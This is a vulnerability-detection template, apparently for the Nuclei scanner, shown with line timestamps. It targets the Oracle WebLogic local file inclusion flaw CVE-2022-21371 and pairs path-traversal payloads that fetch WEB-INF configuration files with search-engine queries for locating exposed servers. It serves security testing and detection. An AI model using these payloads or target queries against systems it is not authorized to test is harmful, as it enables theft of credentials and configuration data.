2022-01-28 11:29:22 +00:00
id : CVE-2022-21371
info :
2022-03-08 14:58:58 +00:00
name : Oracle WebLogic Server Local File Inclusion
2022-01-28 11:29:22 +00:00
author : paradessia,narluin
severity : high
2022-05-17 09:18:12 +00:00
description : An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can read sensitive files containing credentials, configuration details, or other sensitive information.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the latest security patches provided by Oracle to fix the vulnerability.
2022-01-28 11:29:22 +00:00
reference :
2022-03-08 14:58:58 +00:00
- https://www.oracle.com/security-alerts/cpujan2022.html
2022-01-28 11:29:22 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
2022-02-26 17:18:17 +00:00
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/165736/Oracle-WebLogic-Server-14.1.1.0.0-Local-File-Inclusion.html
2024-01-29 17:11:14 +00:00
- https://github.com/Mr-xn/CVE-2022-21371
2022-01-28 11:29:22 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2022-01-28 11:29:22 +00:00
cve-id : CVE-2022-21371
2023-07-11 19:49:27 +00:00
cwe-id : CWE-22
2023-08-31 11:46:18 +00:00
epss-score : 0.96287
2024-01-29 17:11:14 +00:00
epss-percentile : 0.9943
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : oracle
product : weblogic_server
2024-06-07 10:04:29 +00:00
shodan-query :
- http.title:"oracle peoplesoft sign-in"
- product:"oracle weblogic"
2024-05-31 19:23:20 +00:00
fofa-query : title="oracle peoplesoft sign-in"
google-query : intitle:"oracle peoplesoft sign-in"
2023-04-12 10:55:48 +00:00
tags : cve,cve2022,lfi,weblogic,oracle,packetstorm
2022-01-28 11:29:22 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-28 11:29:22 +00:00
- method : GET
2022-02-26 17:18:17 +00:00
raw :
- |+
GET {{path}} HTTP/1.1
Host : {{Hostname}}
2022-01-28 11:29:22 +00:00
2022-02-26 17:18:17 +00:00
payloads :
path :
- .//WEB-INF/weblogic.xml
- .//WEB-INF/web.xml
2022-01-28 11:29:22 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
unsafe : true
2022-01-28 11:29:22 +00:00
matchers-condition : and
matchers :
2022-02-26 17:18:17 +00:00
- type : dsl
dsl :
- 'contains(body, "<web-app") && contains(body, "</web-app>")'
- 'contains(body, "<weblogic-web-app") && contains(body, "</weblogic-web-app>")'
condition : or
- type : dsl
dsl :
2023-06-19 21:10:30 +00:00
- 'contains(header, "text/xml")'
- 'contains(header, "application/xml")'
2022-02-26 17:18:17 +00:00
condition : or
2022-01-28 11:29:22 +00:00
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4b0a00483046022100f3927957dfceb6b130dfad742dc50048a66af5440697a38c30e6dfabbc6f75bf022100839f4947c58227e56f11c16dbe1c9d0b9e7e4e3af614ba54f4030603947a7d7a:922c64590222798bb761d5b6d8e72950